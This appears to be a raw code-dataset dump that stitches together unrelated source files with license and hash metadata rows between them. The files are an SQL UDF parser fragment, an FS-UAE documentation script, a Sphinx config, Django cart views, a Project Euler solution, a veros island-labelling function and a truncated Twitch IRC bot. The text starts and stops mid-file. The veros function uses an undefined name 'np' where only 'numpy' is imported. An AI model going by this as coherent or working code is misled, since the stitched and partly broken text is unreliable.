stack.append(LB([TB('RETURNS '),
self.retval.sqlf(compact)]))
if isinstance(self.impl, SQLString):
stack.append(TB('LANGUAGE js AS'))
stack.append(IB(LB([
self.impl.sqlf(compact), TB(';')
])))
else:
stack.append(TB('AS'))
stack.append(IB(LB([self.impl.sqlf(compact),
TB(';')])))
stack.append(TB(''))
return SB(stack)
@staticmethod
def consume(lex) -> 'Optional[SQLFunction]':
if not (lex.consume(['CREATE', 'TEMP']) or
lex.consume(['CREATE', 'TEMPORARY'])):
return None
comments = lex.get_comments()
lex.expect('FUNCTION')
name = (SQLIdentifier.consume(lex) or
lex.error('Expected UDF name'))
lex.expect('(')
params = []
while True:
var_name = SQLIdentifier.parse(lex)
ltype = SQLType.parse(lex)
params.append(SQLNamedType(var_name, ltype))
if not lex.consume(','):
break
lex.expect(')')
rtype = None
# Javascript function
if lex.consume('RETURNS'):
rtype = SQLType.parse(lex)
lex.expect('LANGUAGE')
lex.expect('JS')
lex.expect('AS')
impl = (SQLString.consume(lex) or
lex.error('Expected Javascript code'))
# SQL-expression
else:
lex.expect('AS')
impl = SQLExpr.parse(lex)
comments.extend(lex.get_comments())
return SQLFunction(name, SQLNodeList(params),
rtype, impl, comments)
|
apache-2.0
| 3,897,709,106,737,068,000
| 27.992
| 78
| 0.586093
| false
| 4.049162
| false
| false
| false
|
FrodeSolheim/fs-uae
|
docs/scripts/update.py
|
1
|
17476
|
#!/usr/bin/env python3
import os
import shutil
import sys
try:
import markdown
except ImportError:
markdown = None
if not os.path.exists("docs/scripts"):
print("Run this script from the project root directory")
sys.exit(1)
last_main_option = ""
last_main_option_added = False
option_data = {}
option_data_all = {}
options = {}
option_repl = {}
f = open("doc/options.html", "w", encoding="UTF-8")
if not os.path.exists("doc/dist"):
os.makedirs("doc/dist")
def handle_option_data(name, data, option):
global last_main_option, last_main_option_added
since = ""
see = ""
default = ""
example = ""
example2 = ""
option["type"] = ""
text = []
h_name = name.replace("-", "_")
name = name.replace("_", "-")
data = data.strip()
org_lines = data.split("\n")
lines = []
in_code = False
in_test = False
for line in org_lines:
if ":" in line or line.startswith("##"):
if line.startswith("##"):
key = line.strip("# ")
value = ""
else:
key, value = line.split(":", 1)
key = key.lower().strip()
value = value.strip()
if key == "since":
since = value
continue
elif key == "see":
see = value
continue
elif key == "default":
default = value
option["default"] = value
continue
elif key == "example":
# example = value
example2 = value
continue
elif key == "type":
option["type"] = value
continue
elif key == "range":
mi, ma = value.split(" - ")
option["min"] = mi.strip()
option["max"] = ma.strip()
continue
elif key == "description":
if value.startswith('"'):
value = value.strip('"')
option["summary_translation"] = True
else:
option["summary_translation"] = False
option["summary"] = value
continue
elif key == "summary":
if value.startswith('"'):
value = value.strip('"')
option["summary_translation"] = True
else:
option["summary_translation"] = False
option["summary"] = value
continue
elif key == "code":
in_code = True
continue
elif key == "tests":
in_code = False
elif key.startswith("test "):
in_code = False
in_test = 1
elif key == "input":
in_code = False
in_test = 1
elif key == "output":
in_test = 2
elif key == "value":
if " - " in value:
value, summary = value.split(" - ", 1)
else:
summary = ""
try:
n, desc = value.split("(", 1)
except ValueError:
n, desc = value, value
else:
n = n.strip()
desc = desc[:-1].strip()
# FIXME: use summary
option["values"].append((n, desc))
# continue
if in_code:
option["code"].append(line[4:])
elif in_test == 1:
pass
elif in_test == 2:
pass
else:
lines.append(line)
# text.append("\n<h2 id=\"{hname}\">"
# "{hname}<a name=\"{name}\"></a></h2>\n".format(
# name=name, hname=h_name))
text.append("<h1>{hname}</h1>\n".format(name=name, hname=h_name))
if since:
text.append("<p>")
text.append("<i>Since {since}</i>.".format(since=since))
if default:
if since:
text.append(" ")
else:
text.append("<p>")
text.append("Default value: {default}".format(default=default))
if example:
if default:
text.append(", ")
elif since:
text.append(" ")
else:
text.append("<p>")
text.append("Example:")
if since or default or example:
text.append("</p>\n")
if example2:
text.append(
"<pre>Example: {hname} = {value}</pre>\n".format(
name=name, hname=h_name, value=example2
)
)
in_list = False
# in_para = False
# in_value = False
last_was_line = False
has_started = False
for line in lines:
if not line.strip() and not has_started:
continue
has_started = True
if (line.startswith("*") or line.startswith("Value:")) or (
in_list and line.startswith(" ")
):
started = False
if not in_list:
started = True
text.append("<ul>\n")
in_list = True
if line.startswith("*") or line.startswith("Value:"):
if not started:
text.append("</li>\n")
text.append("<li>")
else:
text.append(" ")
if line.startswith("Value:"):
if "(" in line:
line = line.split("(")[0][6:].strip()
else:
line = line[6:].strip()
line += " - "
else:
line = line[1:].strip()
text.append(line)
last_was_line = False
else:
if in_list:
text.append("</li>\n</ul>\n")
in_list = False
# if not line.strip():
# text.append("<p>")
# else:
if last_was_line:
if text[-1] == "":
text.append("\n\n")
else:
text.append(" ")
if line.startswith(" "):
text.append("<pre>{0}</pre>".format(line.strip()))
last_was_line = False
else:
text.append(line)
last_was_line = True
if in_list:
text.append("</li>\n</ul>\n")
in_list = False
if see:
# text.append('\n<p>See <a href="#{see}">{see}</a></p>\n'.format(
# see=see))
text.append(
'\n<p>See <a href="{see_l}">{see}</a></p>\n'.format(
see=see, see_l=see.replace("_", "-")
)
)
t = "".join(text)
t = t.replace("\n\n\n", "\n\n")
while " " in t:
t = t.replace(" ", " ")
t = t.replace("</pre><pre>", "\n")
for key, value in option_repl.items():
t = t.replace(key, value)
if "</h2>\n\n<p>See" in t and last_main_option in t:
if last_main_option_added:
f.write(", ")
else:
f.write("\n\nSimilar options: ")
f.write(
'<a name="{name}"></a><a name="{hname}"></a>{hname}'.format(
name=name, hname=h_name
)
)
last_main_option_added = True
else:
last_main_option = name
last_main_option_added = False
f.write(t)
# f.write("\n")
codes = {}
class Code:
def __init__(self):
self.dependencies = None
self.marked = False
def handle_code(option, lines):
# print("handle_code", option)
inputs = set()
for line in lines:
line = line.replace("(", " ")
line = line.replace(")", " ")
line = line.replace(",", " ")
line = line.replace(":", " ")
words = line.split(" ")
for word in words:
word = word.strip()
if not word:
continue
# if word[-1] in "):":
# word = word[:-1]
if word.startswith("c."):
name = word[2:]
name = name.split(".")[0]
if name != option:
inputs.add(name)
inputs = sorted(inputs)
code = Code()
code.option = option
code.inputs = sorted(inputs)
code.lines = lines
codes[option] = code
print(" ", code.inputs)
def handle_option_file(name, path):
print(name)
if os.path.isfile(path):
with open(path, "r", encoding="UTF-8") as option_f:
original_name = name
if original_name.endswith(".md"):
name = name[:-3]
option = {"values": [], "default": "", "code": [], "tests": []}
option_text = option_f.read()
handle_option_data(name, option_text, option)
if option["code"]:
handle_code(name, option["code"])
if "summary" in option:
option_data[name] = option
option_data_all[name] = option
if original_name.endswith(".md") and markdown is not None:
if not os.path.exists("doc/html"):
os.makedirs("doc/html")
html_path = "doc/html/" + name + ".html"
with open(html_path, "w", encoding="UTF-8") as html_f:
html = markdown.markdown(option_text)
html_f.write(html)
def main():
global f
f.write("This page documents the options you can use in FS-UAE ")
f.write('<a href="/fs-uae/configuration-files">configuration files</a>. ')
f.write("The options are sorted in alphabetical order.")
# f.write(" Both hyphens and ")
# f.write("underscores can be used/mixed in option names.")
f.write("\n")
for name in os.listdir("docs/options"):
if name == ".gitignore":
continue
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options", name)):
option_name = name
if name.endswith(".md"):
option_name, _ = os.path.splitext(name)
options[option_name] = os.path.join("docs/options", name)
# option_repl["[{0}]".format(name)] = "<a href=\"#{0}\">{0}</a>".format(name)
option_repl["[{0}]".format(name)] = '<a href="{0}">{1}</a>'.format(
name.replace("_", "-"), name
)
for name in os.listdir("docs/options/launcher"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/launcher", name)):
options[name] = os.path.join("docs/options", "launcher", name)
for name in os.listdir("docs/options/arcade"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/arcade", name)):
options[name] = os.path.join("docs/options", "arcade", name)
for name in os.listdir("docs/options/fsgs"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/fsgs", name)):
options[name] = os.path.join("docs/options", "fsgs", name)
for name in sorted(options.keys()):
if name == "Makefile":
continue
f = open("doc/dist/" + name, "w", encoding="UTF-8")
handle_option_file(name, options[name])
f.close()
with open(
"../fs-uae-launcher-private/fsgamesys/options/constants.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
# noinspection SpellCheckingInspection
"""
)
for key in sorted(option_data_all.keys()):
# Strip leading __ because that will invoke Python's
# name mangling feature
f.write('{} = "{}"\n'.format(key.upper().strip("__"), key))
with open(
"../fs-uae-launcher-private/fsgamesys/options/option.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
# noinspection SpellCheckingInspection
class Option(object):
\"\"\"Constants for option names.\"\"\"
"""
)
for key in sorted(option_data_all.keys()):
# Strip leading __ because that will invoke Python's
# name mangling feature
f.write(' {} = "{}"\n'.format(key.upper().strip("__"), key))
with open(
"../fs-uae-launcher-private/launcher/option.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
from fsgamesys.options.option import Option as BaseOption
# noinspection PyClassHasNoInit
class Option(BaseOption):
@staticmethod
def get(name):
return options[name]
# noinspection PyPep8Naming
def N_(x):
return x
options = {
"""
)
for key in sorted(option_data.keys()):
print(key)
option = option_data[key]
f.write(" Option.{0}: {{\n".format(key.upper()))
f.write(' "default": "{0}",\n'.format(option["default"]))
if len(option["summary"]) == 0:
f.write(' "description": "",\n')
else:
if key.startswith("uae_"):
f.write(' "description":')
if len(option["summary"]) < 50:
f.write(" ")
else:
if option["summary_translation"]:
f.write(' "description": N_(')
else:
f.write(' "description": (')
if len(option["summary"]) >= 50:
f.write("\n ")
if key.startswith("uae_"):
f.write('"{0}",\n'.format(option["summary"]))
else:
f.write('"{0}"),\n'.format(option["summary"]))
f.write(' "type": "{0}",\n'.format(option["type"]))
if len(option["values"]) > 0:
f.write(' "values": [\n')
for name, desc in option["values"]:
if desc.startswith('"'):
if key.startswith("uae_"):
desc = "{0}".format(desc)
else:
desc = "N_({0})".format(desc)
else:
desc = '"{0}"'.format(desc)
f.write(' ("{0}", {1}),\n'.format(name, desc))
f.write(" ]\n")
if "min" in option:
f.write(' "min": {0},\n'.format(option["min"]))
if "max" in option:
f.write(' "max": {0},\n'.format(option["max"]))
f.write(" },\n")
f.write("}\n")
update_codes()
def update_code_dependencies(code):
# print(sorted(codes.keys()))
if code.dependencies is not None:
return
code.dependencies = set()
code.dependencies.update(code.inputs)
for dependency in code.inputs:
code2 = codes[dependency]
update_code_dependencies(code2)
code.dependencies.update(code2.dependencies)
def write_option(f, option):
code = codes[option]
for dependency in sorted(code.dependencies):
write_option(f, dependency)
if not code.marked:
code.marked = True
f.write(" _{0}(c, f)\n".format(option))
def update_codes():
for option, code in codes.items():
update_code_dependencies(code)
with open("doc/options2.py", "w") as f:
f.write("# Automatically generated - do not edit by hand\n")
f.write("\n")
for option in sorted(codes.keys()):
code = codes[option]
f.write(
"\n# noinspection PyUnusedLocal,"
"SpellCheckingInspection,PyUnresolvedReferences\n"
)
f.write("def _{0}(c, f):\n".format(option))
if option.startswith("int_"):
f.write(" # noinspection PyUnresolvedReferences\n")
f.write(" if c.{0}.explicit:\n".format(option))
f.write(
' f.fail("{0} was set explicitly")\n'.format(option)
)
uses_value = False
for line in code.lines:
if not line.strip():
continue
if "value = " in line:
uses_value = True
f.write(" {0}\n".format(line))
if line.strip().startswith("f.fail("):
f.write(line.split("f.fail(")[0])
f.write(' raise Exception("Failed")\n')
if uses_value:
f.write(" c.{0} = value\n".format(option))
f.write("\n")
f.write(
"""\
class AbstractExpandFunctions:
@staticmethod
def matches(a, b):
pass
@staticmethod
def fail(message):
pass
@staticmethod
def warning(message):
pass
@staticmethod
def lower(s):
pass
"""
)
f.write("\ndef expand_config(c, f):\n")
f.write(" assert isinstance(f, AbstractExpandFunctions)\n")
for option in sorted(codes.keys()):
write_option(f, option)
shutil.move(
"doc/options2.py", "../fs-uae-launcher-private/launcher/ui/config/expand.py"
)
if __name__ == "__main__":
main()
|
gpl-2.0
| -654,725,747,254,878,300
| 30.545126
| 90
| 0.463493
| false
| 4.050997
| true
| false
| false
|
openstack/python-senlinclient
|
doc/source/conf.py
|
1
|
2408
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# python-senlinclient documentation build configuration file
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'openstackdocstheme',
]
# The content that will be inserted into the main body of an autoclass
# directive.
autoclass_content = 'both'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/python-senlinclient'
openstackdocs_bug_project = 'python-senlinclient'
openstackdocs_bug_tag = ''
copyright = 'OpenStack Contributors'
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'openstackdocs'
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'senlin', 'OpenStack Senlin command line client',
['OpenStack Contributors'], 1),
]
|
apache-2.0
| 1,665,903,313,054,131,200
| 33.4
| 79
| 0.69892
| false
| 4.13036
| false
| false
| false
|
gregplaysguitar/django-trolley
|
cart/views.py
|
1
|
17305
|
# -*- coding: utf-8 -*-
import simplejson
from django.http import HttpResponse, HttpResponseNotAllowed, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import get_object_or_404
from django.conf import settings
from django.template.loader import get_template
from django.template.loader import render_to_string
from django.template.loader import TemplateDoesNotExist
from django.core.mail import send_mail
from django.core.mail import EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.utils import importlib
from django.views.decorators.cache import never_cache
from django.contrib.contenttypes.models import ContentType
from api import ItemAlreadyExists
from utils import form_errors_as_notification, get_current_site
import settings as cart_settings
from models import Order
from forms import AddToCartForm, OrderForm, shipping_options_form_factory, order_detail_form_factory, checkout_form_factory
import helpers
render_to_response = helpers.get_render_function()
def index(request):
"""Dummy view for backwards-compatibility - allows reversing of cart.view.index"""
pass
def validate_cart(request, view):
cart = helpers.get_cart()(request)
if view == 'delivery':
return cart.is_valid()
elif view == 'payment':
return bool(Order.objects.filter(pk=cart.data.get('order_pk', None)).count())
def steps(request):
steps = []
if not cart_settings.SKIP_CHECKOUT:
steps.append((reverse('cart.views.checkout'), 'Review Order'))
for step in [
('delivery', 'Delivery Details'),
('payment', 'Payment Details')
]:
if validate_cart(request, step[0]):
steps.append((reverse('cart.views.%s' % step[0]), step[1]))
else:
steps.append((None, step[1]))
return steps
@never_cache
def checkout(request):
"""Display a list of cart items, quantities, total etc, with the option
to change quantities, specify shipping options etc."""
if cart_settings.SKIP_CHECKOUT:
return HttpResponseRedirect(reverse('cart.views.delivery'))
else:
cart = helpers.get_cart()(request)
shipping_options_form_cls = shipping_options_form_factory(cart)
checkout_form_cls = checkout_form_factory()
if request.method == 'POST':
checkout_form = checkout_form_cls(request.POST)
shipping_options_form = shipping_options_form_cls(request.POST, prefix='shipping')
valid = checkout_form.is_valid() and shipping_options_form.is_valid()
if valid:
cart.update_detail_data(checkout_form.cleaned_data)
cart.update_shipping_options(shipping_options_form.cleaned_data)
for item in cart:
# update quantities if changed
q = request.POST.get('quantity-%s' % item.formindex, None)
if q == 'remove':
quantity = 0
else:
try:
quantity = int(q)
except ValueError:
quantity = item['quantity']
if quantity != item['quantity']:
cart.update(item.product, quantity, item['options'])
if request.POST.get('next', False):
redirect_url = reverse(delivery)
else:
redirect_url = request.path_info
if request.is_ajax():
html = render_to_string(
'cart/checkout_ajax.html',
RequestContext(request, {
'cart': cart,
'steps': steps(request),
'current_step': 1,
'checkout_form': checkout_form,
'shipping_options_form': shipping_options_form,
})
)
return HttpResponse(simplejson.dumps({
'success': valid,
'cart': cart.as_dict(),
'redirect_url': redirect_url if valid else None,
'html': html,
}), mimetype='application/json')
elif valid:
return HttpResponseRedirect(redirect_url)
else:
checkout_form = checkout_form_cls(initial=cart.detail_data)
shipping_options_form = shipping_options_form_cls(prefix='shipping', initial=cart.shipping_options)
return render_to_response(
'cart/checkout.html',
RequestContext(request, {
'cart': cart,
'steps': steps(request),
'current_step': 1,
'checkout_form': checkout_form,
'shipping_options_form': shipping_options_form,
})
)
@never_cache
def delivery(request):
"""Collects standard delivery information, along with any extra information
from the order_detail model."""
cart = helpers.get_cart()(request)
order_form_cls = helpers.get_order_form()
detail_cls = helpers.get_order_detail()
if not validate_cart(request, 'delivery'):
return HttpResponseRedirect(reverse(checkout))
else:
try:
instance = Order.objects.get(pk=cart.data.get('order_pk', None))
if detail_cls:
try:
detail_instance = instance.get_detail()
except detail_cls.DoesNotExist:
detail_instance = None
else:
detail_instance = None
except Order.DoesNotExist:
instance = None
detail_instance = None
# get detail form, or dummy form if no ORDER_DETAIL_MODEL defined
detail_form_cls = order_detail_form_factory()
form_kwargs = {'label_suffix': '', 'instance': instance, 'initial': cart.data}
detail_form_kwargs = {'label_suffix': '', 'instance': detail_instance, 'initial': cart.detail_data, 'prefix': 'detail'}
if request.POST:
form = order_form_cls(request.POST, **form_kwargs)
detail_form = detail_form_cls(request.POST, **detail_form_kwargs)
valid = form.is_valid() and detail_form.is_valid()
if valid:
order = form.save(commit=False)
order.session_id = request.session.session_key
order.shipping_cost = cart.shipping_cost()
# save needed here to create the primary key
order.save()
for line in order.orderline_set.all():
line.delete()
for item in cart:
order.orderline_set.create(
product=item.product,
quantity=item['quantity'],
price=item.row_total(),
options=simplejson.dumps(item['options'])
)
# if the form has no 'save' method, assume it's the dummy form
if callable(getattr(detail_form, 'save', None)):
# the detail object may have been created on order save, so check for that
if detail_cls:
try:
detail_form.instance = order.get_detail()
except detail_cls.DoesNotExist:
pass
detail = detail_form.save(commit=False)
detail.order = order # in case it is being created for the first time
for field in cart_settings.CHECKOUT_FORM_FIELDS:
setattr(detail, field, cart.detail_data[field])
detail.save()
# confirmed status can trigger notifications etc, so don't set it until all
# order info is in the database
order.status = 'confirmed'
order.save()
cart.update_data({'order_pk': order.pk})
cart.modified()
redirect_url = reverse('cart.views.payment', args=(order.hash,))
else:
redirect_url = None
if request.is_ajax():
html = render_to_string(
'cart/delivery_ajax.html',
RequestContext(request, {
'cart': cart,
'form': form,
'detail_form': detail_form,
'steps': steps(request),
'current_step': 2,
})
)
return HttpResponse(simplejson.dumps({
'success': valid,
'cart': cart.as_dict(),
'redirect_url': redirect_url,
'hard_redirect': True,
'html': html,
}), mimetype='application/json')
elif valid:
return HttpResponseRedirect(redirect_url)
else:
form = order_form_cls(**form_kwargs)
detail_form = detail_form_cls(**detail_form_kwargs)
return render_to_response(
'cart/delivery.html',
RequestContext(request, {
'cart': cart,
'form': form,
'detail_form': detail_form,
'steps': steps(request),
'current_step': 2,
})
)
@never_cache
def payment(request, order_hash=None, param=None):
"""Handle payments using the specified backend."""
if order_hash:
order = get_object_or_404(Order, hash=order_hash)
else:
cart = helpers.get_cart()(request)
if not validate_cart(request, 'payment'):
return HttpResponseRedirect(reverse('cart.views.delivery'))
else:
# Assume this will work since validate_cart returned True
order = Order.objects.get(pk=cart.data['order_pk'])
return HttpResponseRedirect(reverse('cart.views.payment', args=(order.hash,)))
if order.total():
if cart_settings.PAYMENT_BACKEND:
try:
backend_module = importlib.import_module(cart_settings.PAYMENT_BACKEND)
except ImportError:
# Try old format for backwards-compatibility
backend_module = importlib.import_module('cart.payment.%s' % cart_settings.PAYMENT_BACKEND)
backend = backend_module.PaymentBackend()
return backend.paymentView(request, param, order)
else:
# If no payment backend, assume we're skipping this step
return HttpResponseRedirect(order.get_absolute_url())
else:
order.payment_successful = True
order.save()
return HttpResponseRedirect(order.get_absolute_url())
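# A minimal sketch of what a payment backend module is assumed to provide
# (illustrative only; the dotted module path is taken from
# cart_settings.PAYMENT_BACKEND and paymentView is invoked as in payment()
# above):
#
#     class PaymentBackend(object):
#         def paymentView(self, request, param, order):
#             # take the payment here, then send the user on to the
#             # completed-order page
#             return HttpResponseRedirect(order.get_absolute_url())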
@never_cache
def complete(request, order_hash):
"""Display completed order information."""
cart = helpers.get_cart()(request)
cart.clear()
order = get_object_or_404(Order, hash=order_hash)
if not order.notification_sent:
notify_body = render_to_string(
'cart/email/order_notify.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
send_mail(
"Order Received",
notify_body,
settings.DEFAULT_FROM_EMAIL,
[t[1] for t in cart_settings.MANAGERS]
)
order.notification_sent = True
order.save()
if order.email and not order.acknowledgement_sent:
acknowledge_body = render_to_string(
'cart/email/order_acknowledge.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
acknowledge_subject = render_to_string(
'cart/email/order_acknowledge_subject.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
try:
acknowledge_body_html = render_to_string('cart/email/order_acknowledge.html',
RequestContext(request, {'order': order, 'site': get_current_site()}))
except TemplateDoesNotExist:
acknowledge_body_html = None
msg = EmailMultiAlternatives(acknowledge_subject,
acknowledge_body,
settings.DEFAULT_FROM_EMAIL,
[order.email])
if acknowledge_body_html:
msg.attach_alternative(acknowledge_body_html, "text/html")
msg.send()
order.acknowledgement_sent = True
order.save()
return render_to_response(
'cart/complete.html',
RequestContext(request, {
'order': order,
})
)
def clear(request):
"""Remove all items from the cart."""
if request.method != 'POST':
return HttpResponseNotAllowed('GET not allowed; POST is required.')
else:
helpers.get_cart()(request).clear()
notification = (messages.SUCCESS, 'Your cart was emptied',)
if request.is_ajax():
response = HttpResponse()
response.write(simplejson.dumps({
'notification': notification
}))
return response
else:
messages.add_message(request, *notification)
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
@never_cache
def update(request):
"""Update cart quantities."""
if request.method != 'POST':
return HttpResponseNotAllowed('GET not allowed; POST is required.')
else:
cart = helpers.get_cart()(request)
for item in cart:
index = 'quantity-%s' % unicode(item.formindex)
if index in request.POST:
try:
quantity = int(request.POST[index])
cart.update(item.product, quantity, item['options'])
except ValueError:
pass
notification = (messages.SUCCESS, 'Cart updated. <a href="%s">View cart</a>' % (reverse(checkout)))
if request.is_ajax():
response = HttpResponse()
data = {
'cart': cart.as_dict(),
'notification': notification,
}
response.write(simplejson.dumps(data))
return response
else:
messages.add_message(request, *notification)
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
def add(request, content_type_id, product_id, form_class=None):
"""Add a product to the cart
POST data should include content_type_id,
"""
if request.method != 'POST':
return HttpResponseNotAllowed(['POST'])
else:
ctype = get_object_or_404(ContentType, pk=content_type_id)
product = get_object_or_404(ctype.model_class(), pk=product_id)
if not form_class:
form_class = helpers.get_add_form(product)
form = form_class(request.POST, product=product)
cart = helpers.get_cart()(request)
if form.is_valid():
form.add(request)
notification = (messages.SUCCESS, 'Product was added to your cart. <a href="%s">View cart</a>' % (reverse(checkout)))
else:
notification = (messages.ERROR, 'Could not add product to cart. \r%s' % form_errors_as_notification(form))
if request.is_ajax():
data = {
'notification': notification,
'cart': cart.as_dict(),
'checkout_url': reverse('cart.views.checkout'),
'delivery_url': reverse('cart.views.delivery'),
}
if form.is_valid():
data.update({
'success': True,
'cart': cart.as_dict(),
'product_pk': product.pk,
'product_name': product.name,
'product_quantity_added': form.get_quantity(),
'product_quantity': cart.get(product, form.get_options())['quantity'],
'total_quantity': cart.quantity(),
})
return HttpResponse(simplejson.dumps(data), mimetype='application/json')
else:
messages.add_message(request, *notification)
if form.is_valid():
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
else:
return HttpResponseRedirect(request.META.get('HTTP_REFERER', reverse(checkout)))
|
bsd-3-clause
| -3,236,693,349,976,724,500
| 35.976496
| 129
| 0.535452
| false
| 4.767218
| false
| false
| false
|
dhermes/project-euler
|
python/complete/no335.py
|
1
|
1809
|
#!/usr/bin/env python
# Since M(2**n + 1) = 4**n - 3**n + 2**(n + 1) (empirically),
# we find sum_{n=0}^{P} M(2**n + 1) is equal to
# (4**(P + 1) - 1)/3 - (3**(P + 1) - 1)/2 + 2*(2**(P + 1) - 1)
# = (4*(4**P) - 1)*(3**(-1)) - (3*(3**P) - 1)*(2**(-1)) + 4*(2**P) - 2
# (This is because (r - 1)*(r**P + ... + r + 1) = r**(P + 1) - 1
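# A quick arithmetic check of the closed form: for P = 2 the per-term values
# of 4**n - 3**n + 2**(n + 1) are 2, 5 and 15, which sum to 22, and
# (4**3 - 1)/3 - (3**3 - 1)/2 + 2*(2**3 - 1) = 21 - 13 + 14 = 22 as well.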
from python.decorators import euler_timer
from python.functions import inverse_mod_n
def moves(n):
if n < 3:
return n
goal_state = [1] * n
state = [0, 2] + [1] * (n - 2)
num_moves = 1
last_placed = 1
while state != goal_state:
beans = state[last_placed]
state[last_placed] = 0
for bean in range(1, beans + 1):
next_index = (last_placed + bean) % n
state[next_index] += 1
last_placed = (last_placed + beans) % n
num_moves += 1
return num_moves
def check_formula(n):
return (moves(2 ** n + 1) == 4 ** n - 3 ** n + 2 ** (n + 1))
# Since (a**(n**k))**n = a**(n*(n**k)) = a**(n**(k + 1)),
# We can easily compute X**(P + 1) = X*(X**P) for P = 10**18
def modular_exponentiate(val, exp_base, exp_power, modulus):
result = val
for i in xrange(exp_power):
result = (result ** exp_base) % modulus
return result
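# For example, modular_exponentiate(2, 10, 2, 1000) raises 2 to the 10th power
# twice (2 -> 24 -> 376 mod 1000), i.e. it returns 2**(10**2) mod 1000.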
def main(verbose=False):
for n in range(10):
if not check_formula(n):
raise Exception("Proposed formula for M(2**k + 1) incorrect.")
modulus = 7 ** 9
p_2 = 4 * modular_exponentiate(2, 10, 18, modulus) - 2
p_3 = 3 * modular_exponentiate(3, 10, 18, modulus) - 1
p_4 = 4 * modular_exponentiate(4, 10, 18, modulus) - 1
return (p_4 * inverse_mod_n(3, modulus) -
p_3 * inverse_mod_n(2, modulus) + p_2) % (modulus)
if __name__ == '__main__':
print euler_timer(335)(main)(verbose=True)
|
apache-2.0
| -1,711,806,754,531,232,000
| 29.15
| 74
| 0.512438
| false
| 2.614162
| false
| false
| false
|
dionhaefner/veros
|
veros/core/streamfunction/island.py
|
1
|
1983
|
import numpy
import scipy.ndimage
from ... import veros_method, runtime_settings as rs
from .. import utilities
@veros_method
def isleperim(vs, kmt, verbose=False):
utilities.enforce_boundaries(vs, kmt)
if rs.backend == 'bohrium':
kmt = kmt.copy2numpy()
structure = numpy.ones((3, 3)) # merge diagonally connected land masses
# find all land masses
labelled, _ = scipy.ndimage.label(kmt == 0, structure=structure)
# find and set perimeter
land_masses = labelled > 0
inner = scipy.ndimage.binary_dilation(land_masses, structure=structure)
perimeter = numpy.logical_xor(inner, land_masses)
labelled[perimeter] = -1
# match wrapping periodic land masses
if vs.enable_cyclic_x:
west_slice = labelled[2]
east_slice = labelled[-2]
for west_label in numpy.unique(west_slice[west_slice > 0]):
east_labels = numpy.unique(east_slice[west_slice == west_label])
east_labels = east_labels[~numpy.isin(east_labels, [west_label, -1])]
if not east_labels.size:
# already labelled correctly
continue
assert len(numpy.unique(east_labels)) == 1, (west_label, east_labels)
labelled[labelled == east_labels[0]] = west_label
utilities.enforce_boundaries(vs, labelled)
# label landmasses in a way that is consistent with pyom
labels = numpy.unique(labelled[labelled > 0])
label_idx = {}
for label in labels:
# find index of first island cell, scanning west to east, north to south
label_idx[label] = np.argmax(labelled[:, ::-1].T == label)
sorted_labels = list(sorted(labels, key=lambda i: label_idx[i]))
# ensure labels are numbered consecutively
relabelled = labelled.copy()
for new_label, label in enumerate(sorted_labels, 1):
if label == new_label:
continue
relabelled[labelled == label] = new_label
return np.asarray(relabelled)
|
mit
| 4,557,765,566,113,674,000
| 32.610169
| 81
| 0.646495
| false
| 3.547406
| false
| false
| false
|
AlessandroMinali/pyIRCbot
|
pyIRCbot.py
|
1
|
2803
|
#Alessandro Minali 2014
# www.alessandrom.me
#questions/suggestions/feedback to: alessandro.minali@gmail.com
##ONLY CHANGE VALUES THAT HAVE COMMENTS BESIDE THEM
import socket
import commands
import moderation
import time
class PyIRCBot():
def __init__(self):
HOST = "irc.twitch.tv"
PORT = 6667
REALNAME = "Bot"
data = self.config()
NICK = data[0] ##This has to be your bots username.
IDENT = data[0] ##Bot username again.
PASS = data[1] ##This has to be your oauth token.
self.CHANNEL = data[2] ##This is the channel your bot will be working on.
self.flag = data[3]
self.s = socket.socket()
self.s.connect((HOST, PORT))
self.s.send("PASS %s\r\n" % PASS)
self.s.send("NICK %s\r\n" % NICK)
self.s.send("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME))
self.s.send("JOIN %s\r\n" % self.CHANNEL)
def run(self):
LAST_MESSAGE = ""
readbuffer = ""
print "Running..."
while(1):
time.sleep(0.3)
readbuffer = readbuffer + self.s.recv(1024)
temp = readbuffer.split("\n")
readbuffer = temp.pop()
self.debug(temp)
for line in temp:
message = line.split(":")
name = message[1].split("!")[0]
